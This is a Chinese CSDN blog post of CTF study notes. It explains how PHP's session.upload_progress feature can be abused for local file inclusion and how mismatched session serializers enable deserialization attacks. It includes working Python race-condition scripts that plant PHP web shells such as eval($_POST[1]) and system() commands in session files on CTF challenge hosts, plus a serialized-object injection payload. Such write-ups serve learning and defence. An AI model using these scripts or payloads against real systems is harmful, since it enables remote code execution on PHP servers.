php-session文件包含和反序列化(对session.upload_progress的利用)

最新推荐文章于 2022-06-23 17:36:36 发布
最新推荐文章于 2022-06-23 17:36:36 发布
阅读量1.5k 收藏 8
点赞数 1
分类专栏: CTF训练日记 Web安全 文章标签: php 服务器 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/unexpectedthing/article/details/122888905
版权

文章目录

前言

本文是利用PHP_SESSION_UPLOAD_PROGRESS进行文件包含和反序列化的总结。

也就是关于php-session的文件包含和反序列化

session的简介

session被称为“会话控制”,Session 对象存储特定用户会话所需的属性及配置信息。这样,当用户在应用程序的 Web 页之间跳转时,存储在 Session 对象中的变量将不会丢失,而是在整个用户会话中一直存在下去。当用户请求来自应用程序的 Web 页时,如果该用户还没有会话,则 Web 服务器将自动创建一个 Session 对象。当会话过期或被放弃后,服务器将终止该会话。Session 对象最常见的一个用法就是存储用户的首选项。例如,如果用户指明不喜欢查看图形,就可以将该信息存储在 Session 对象中.

当第一次访问网站时,Seesion_start()函数就会创建一个唯一的Session ID,并自动通过HTTP的响应头,将这个Session ID保存到客户端Cookie中。同时,也在服务器端创建一个以Session ID命名的文件,用于保存这个用户的会话信息。当同一个用户再次访问这个网站时,也会自动通过HTTP的请求头将Cookie中保存的Seesion ID再携带过来,这时Session_start()函数就不会再去分配一个新的Session ID,而是在服务器的硬盘中去寻找和这个Session ID同名的Session文件,将这之前为这个用户保存的会话信息读出,在当前脚本中应用,达到跟踪这个用户的目的

session和cookie的联系:

cookie中的PHPSESSID将作为服务器session的文件名sess__xxx,浏览器直接根据这个去服务器中找对应的sessid

PHP中session的存储方式

直接放y4爷写的总结吧

php中的session中的内容并不是放在内存中的,而是以文件的方式来存储的,存储方式就是由配置项session.save_handler来进行确定的,默认是以文件的方式存储。

php_serialize经过serialize()函数序列化数组
php键名+竖线+经过serialize()函数处理的值
php_binary键名的长度对应的ascii字符+键名+serialize()函数序列化的值

php.ini中的一些配置

session.save_path="" --设置session的存储路径
session.save_handler=""–设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式)
session.auto_start boolen–指定会话模块是否在请求开始时启动一个会话默认为0不启动
session.serialize_handler string–定义用来序列化/反序列化的处理器名字。默认使用php

php中的session.upload_progress

版本:php5.4以上

在php.ini有以下几个默认选项

1. session.upload_progress.enabled = on
2. session.upload_progress.cleanup = on
3. session.upload_progress.prefix = "upload_progress_"
4. session.upload_progress.name = "PHP_SESSION_UPLOAD_PROGRESS"
5. session.upload_progress.freq = "1%"
6. session.upload_progress.min_freq = "1"

其中
enabled=on表示upload_progress功能开始,也意味着当浏览器向服务器上传一个文件时,php将会把此次文件上传的详细信息(如上传时间、上传进度等)存储在session当中 ;

cleanup=on表示当文件上传结束后,php将会立即清空对应session文件中的内容,这个选项非常重要;

name当它出现在表单中,php将会报告上传进度,最大的好处是,它的值可控;

prefix+name将表示为session中的键名

session文件包含和反序列化就是利用session.upload_progress,可以将上传的文件信息保存在session中.

文件包含

一般默认配置session.upload_progress.cleanup = on导致文件上传后,session文件内容立即清空,我们需要进行条件竞争.如果为off,就不需要利用条件竞争.

脚本:

文件上传

import requests
import threading

session = requests.session()
sess = 'zzy' #上传文件的PHPSESSION的ID
url1 = "http://74a4727a-4f34-4d21-bd52-95c73db10eed.challenge.ctf.show:8080/"
url2 = "http://74a4727a-4f34-4d21-bd52-95c73db10eed.challenge.ctf.show:8080/upload/"
data1 = {
    'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("tac ../f*");?>'# 传入的恶意代码
}
file = {
    'file': 'zzy'
}
cookies = {
    'PHPSESSID': sess
}


def write():
    while True:
        r = session.post(url1, data=data1, files=file, cookies=cookies)


def read():
    while True:
        r = session.get(url2)
        if 'flag' in r.text:
            print(r.text)


threads = [threading.Thread(target=write),
           threading.Thread(target=read)]
for t in threads:
    t.start()

文件包含

import requests
import threading
import sys

session = requests.session()
sess = 'zzy'
url1 = "http://0bd266c6-b013-4a9a-97b5-2a644856a1e5.challenge.ctf.show:8080/"
url2 = 'http://0bd266c6-b013-4a9a-97b5-2a644856a1e5.challenge.ctf.show:8080/?file=/tmp/sess_' + sess

# file后为phpsession的路径
data1 = {
    'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST[1]);?>'
}
data2 = {
    '1': 'system("cat f*");'
}
file = {
    'file': 'abc'
}
cookies = {
    'PHPSESSID': sess
}


def write():
    while True:
        r = session.post(url1, data=data1, files=file, cookies=cookies)


def read():
    while True:
        r = session.post(url2, data=data2)
        if 'ctfshow{' in r.text:
            print(r.text)


threads = [threading.Thread(target=write),
           threading.Thread(target=read)]
for t in threads:
    t.start()

上面两个脚本的区别

文件上传,用url1的内容,post向phpsession中爆flag,然后通过访问url2,可以触发upload下的index.php,然后到.user.ini,再到png中去include PHPSESSION的内容,执行命令。如果是传入小马,url2需要post内容,执行命令

文件包含:url1的内容,来向phpsession中写入小马,然后,通过url2的file的参数去包含phpsession的路径,加上url2的post来执行命令,从而得到flag。

关于文件包含还有个脚本

import io
import requests
import threading
url = 'http://challenge-cfd946d2e06b103c.sandbox.ctfhub.com:10800'

def write(session):
    data = {
        'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("cat /flag_is_here_not_are_but_you_find");?>dotasts'
    }
    while True:
        f = io.BytesIO(b'a' * 1024 * 10)
        response = session.post(url,cookies={'PHPSESSID': 'flag'}, data=data, files={'file': ('dota.txt', f)})
def read(session):
    while True:
        response = session.get(url+'?file=/tmp/sess_flag')
        if 'dotasts' in response.text:
            print(response.text)
            break
        else:
            print('retry')

if __name__ == '__main__':
    session = requests.session()
    write = threading.Thread(target=write, args=(session,))
    write.daemon = True
    write.start()
    read(session)

例子有CTF-第五空间

ctfshow有个题也可以这么做

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);

利用条件:

1. 存在文件包含漏洞

2. 知道session文件存放路径,可以尝试默认路径

3. 具有读取和写入session文件的权限

反序列化

$_SESSION变量直接可控

php引擎的存储格式是键名|serialized_string,而php_serialize引擎的存储格式是serialized_string。如果程序使用两个引擎来分别处理的话就会出现问题

实验:

1.php:

<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();
$_SESSION['z3eyond'] = $_GET['a'];
var_dump($_SESSION);

2.php

<?php
ini_set('session.serialize_handler', 'php');
session_start();
class test{
    public $name;
    function __wakeup(){
        echo $this->name;
    }
}

首先访问1.php,传入参数a=|O:4:"test":1:{s:4:"name";s:7:"z3eyond";}再访问2.php,注意不要忘记|

会发现2.php出现了z3eyond

这是因为1.php是使用php_serialize引擎处理,因此只会把'|'当做一个正常的字符。然后访问2.php,由于用的是php引擎,因此遇到'|'时会将之看做键名与值的分割符,从而造成了歧义,导致其在解析session文件时直接对'|'后的值进行反序列化处理。

为什么1.php可以触发2.php的__wakeup()?

我的理解是,1.php中session_start()开始会话,写入了session文件,然后访问2.php,session_start(),读取了session文件。而由于引擎不一样,从而引发了__wakeup的不同。

关于session_start():

当会话自动开始或者通过 session_start() 手动开始的时候, PHP 内部会调用会话管理器的 open 和 read 回调函数。 会话管理器可能是 PHP 默认的, 也可能是扩展提供的(SQLite 或者 Memcached 扩展), 也可能是通过 session_set_save_handler() 设定的用户自定义会话管理器。 通过 read 回调函数返回的现有会话数据(使用特殊的序列化格式存储),PHP 会自动反序列化数据并且填充 $_SESSION 超级全局变量

所以我们可以通过这种来构造攻击.

CTF题目:

bestphp‘revenge

$_SESSION变量不可控

参考这个CTF题

CTFSHOW新春欢乐赛web7

参考链接

https://www.freebuf.com/vuls/202819.html
https://blog.csdn.net/solitudi/article/details/113588692?spm=1001.2014.3001.5502
https://y4tacker.blog.csdn.net/article/details/113588692?spm=1001.2014.3001.5502
Z3eyOnd
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP基于session.upload_progress 实现文件上传进度显示功能详解
10-16
主要介绍了PHP基于session.upload_progress 实现文件上传进度显示功能,结合实例形式分析了php5.4版本session.upload_progress特性实现文件上传进度显示的相关操作技巧,需要的朋友可以参考下
PHP 获取文件上传进度
郎涯技术
07-22 4055
获取文件上传进度的方法很多,该文介绍的是使用session.upload_progress,基于PHP 5.4以上版本的方法。 【1】文件php.ini 配置 根据实际情况进行设置 session.upload_progress.enabled[=1] : 是否启用上传进度报告(默认开启) session.upload_progress.cleanup[=1] : 是否在上传完成后及时删除
php通过session实现upload_progress
prape's world!
01-07 1144
php中,显示上传文件进度有swf,apc,纯javascript等集中方法,而现在比较推荐的是利用phpsessionPHP>5.4)实现,这里,我简单的记录一下。 相关资料可以参考php.net/manual/en/session.upload-progress.php,还是相对比较简单的,可以参考www.111cn.net/phper/php-cy/54314.htm这里的讲解,但是
[NPUCTF2020]ezinclude php segment fault特性 PHP_SESSION_UPLOAD_PROGRESS文件包含
scrawman的博客
11-25 358
[NPUCTF2020]ezinclude 如果什么都没传会返回这个Hash值,猜测是name为空时pass的值 整挺好,跳出来了flflflflag.php 因为直接访问会跳到404页面所以还是得抓包 先用filter伪协议读取源文件:/flflflflag.php?file=php://filter/read=convert.base64-encode/resource=index.php 返回的是base64编码过的,解码过后得到源码: <html> <head> <
PHP利用Session实现上传进度
风口上的猪博客
11-03 265
实现文件上传进度条基本是依靠JS插件或HTML5的File API来完成,其实PHP配合ajax也能实现此功能。 PHP手册对于session上传进度是这么介绍的: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 当 session.upload_progress.enabled INI 选项开启时,PHP 能够在每一个文件上传时监测上传进度。 这个信息
Session文件包含
一只web狗
06-23 3361
session文件包含介绍
记一次PHP_SESSION_UPLOAD_PROGRESS的本地文件包含
末初的CSDN博客
05-07 913
来源于今天一位朋友给的题目,叫我帮忙看看 题目名字是有提示LFI,这个登录框测试了一下发现输入什么都是返回一样,也没有有注入的迹象,url很明显可能存在LFI,尝试下读取logo.php /?page=php://filter/convert.base64-encode/resource=login.php 有过滤,简单fuzz了下发现过滤了如下 base、file、http、ftp、phar、gopher、data、zip、read、rot、string、decode、flag、..... 但.
详解利用session进行文件包含
合天网安学院
09-14 2665
什么是session.upload_progress?与open_basedir、allow_url_fopen、allow_url_include等PHP配置一样,session.upl...
PHP_Session文件上传利用文件包含
soldi_er的博客
05-20 650
文章目录靶场实验环境说明Python脚本修改Python利用脚本本地测试 靶场实验 环境说明   (1)软件和文件位置说明: 项目 说明 文件包含文件的位置 http://127.0.0.1/include.php Session文件的相对存储位置 …/Extensions\tmp\tmp\ Python解释器版本 python2.7,22行和25行使用xrange() Python解释器版本 Python3.7,22行和25行使用range() 操作系统 Win10
上传进度支持(Upload progress in sessions)
10-19 1171
作者: Laruence 本文地址: http://www.laruence.com/2011/10/10/2217.html 文件上传进度反馈, 这个需求在当前是越来越普遍, 比如大附件邮件. 在PHP5.4以前, 我们可以通过APC提供的功能来实现. 或者使用PECL扩展uploadprogress来实现. 虽然说, 它们能很好的解决现在的问题, 但是也有很明显的不足:
gnome-session-wayland-session-3.28.1-13.el8.x86_64.rpm
12-05
官方离线安装包,亲测可用
深入解析PHPSESSION反序列化机制
10-20
主要介绍了PHPSESSION反序列化机制的相关资料,文中介绍的非常相信,相信对大家具有一定的参考价值,需要的朋友们下面来一起看看吧。
gnome-session-wayland-session-3.28.1-8.el7.x86_64.rpm
12-13
官方离线安装包,亲测可用。使用rpm -ivh [rpm完整包名] 进行安装
CTF训练之路2--ctfshow内部赛
unexpectedthing的博客
11-07 6501
文章目录签到登录就有flag出题人不想跟你说话.jpg蓝廋一览无余签退 签到 一进去就是login界面,F12看到有个register.php,说明就是一个二次注入的sql注入题。 所谓二次注入,就是再register中构造sql语句,然后登录login来触发。 找到羽师傅的脚本 import requests import re url_register = "http://7b093e85-e6d5-4784-adab-49ba20992eda.challenge.ctf.show/register.
文件包含漏洞+php伪协议
unexpectedthing的博客
11-11 6024
文章目录常见的文件包含函数基本绕过:利用php伪协议1.php://input2.php://filter3.data协议4.zip协议5.bzip2://协议6.zlib://协议7. phar://协议8..file协议日志包含介绍利用条件漏洞利用流程日志文件路径远程文件包含条件流程PHPSESSION包含包含/proc/self/environ文件包含临时文件过程包含上传文件绕过类型指定后缀绕过利用长度截断%00截断url指定前缀截断目录遍历编码参考文献 常见的文件包含函数 php文件包含函数有下面四
SSRF--gopher协议打FastCGI
unexpectedthing的博客
11-30 5933
FastCGI 定义: 什么是CGI CGI全称"通用网关接口"(Common Gateway Interface),用于HTTP服务器与其它机器上的程序服务通信交流的一种工具,CGI程序须运行在网络服务器上。 传统CGI接口方式的主要缺点是性能较差,因为每次HTTP服务器遇到动态程序时都需要重启解析器来执行解析,然后结果被返回给HTTP服务器。这在处理高并发访问几乎是不可用的,因此就诞生了FastCGI。另外传统的CGI接口方式安全性也很差。 什么是FastCGI FastCGI是一个可伸缩地、高速地
phar反序列化+两道CTF例题
unexpectedthing的博客
02-14 5902
Phar反序列化 phar文件本质上是一种压缩文件,会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动反序列化meta-data内的内容。(漏洞利用点) 什么是phar文件 在软件中,PHAR(PHP归档)文件是一种打包格式,通过将许多PHP代码文件和其他资源(例如图像,样式表等)捆绑到一个归档文件中来实现应用程序和库的分发 php通过用户定义和内置的“流包装器”实现复杂的文件处理功能。内置包装器可用于文件系统函数,如(fopen(),copy(),file
php原生类的总结
unexpectedthing的博客
12-12 5221
文章目录前言利用Error/Exception 内置类进行 XSSError内置类Exception内置类[BJDCTF 2nd]xss之光使用 Error/Exception 内置类绕过哈希比较Error类Exception 类[2020 极客大挑战]GreatphpSoapClient类来进行SSRF 前言 之所以这个总结,极客大挑战的SoEzunser考到了php原生类来遍历目录 其实,在CTF题目中,可以利用php原生类来进行XSS,反序列化,SSRF,XXE和读文件的思路 通过遍历看一下php的内
app.session_interface.open_session 怎么使用
最新发布
05-31
`app.session_interface.open_session`是Flask框架中一个用于创建新会话的方法。下面是一个简单的示例: ```python from flask import Flask app = Flask(__name__) app.secret_key = 'your_secret_key_here' @app.route('/') def index(): session = app.session_interface.open_session(app, request) session['username'] = 'John' return 'Hello, ' + session['username'] if __name__ == '__main__': app.run() ``` 在这个示例中,我们使用`open_session`方法创建了一个新的会话对象,并将其存储在`session`变量中。我们还将一个键为`'username'`、值为`'John'`的项添加到会话中。最后,我们将会话中的`'username'`项的值返回给用户。 需要注意的是,`app.session_interface.open_session`方法并不是单独使用的方法,它通常用于与Flask中的会话管理器一起使用。在上面的示例中,我们使用了Flask默认的会话管理器,即`app.secret_key`。如果您使用了自定义的会话管理器,那么您可能需要修改`app.session_interface`属性来使用自定义的会话管理器。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值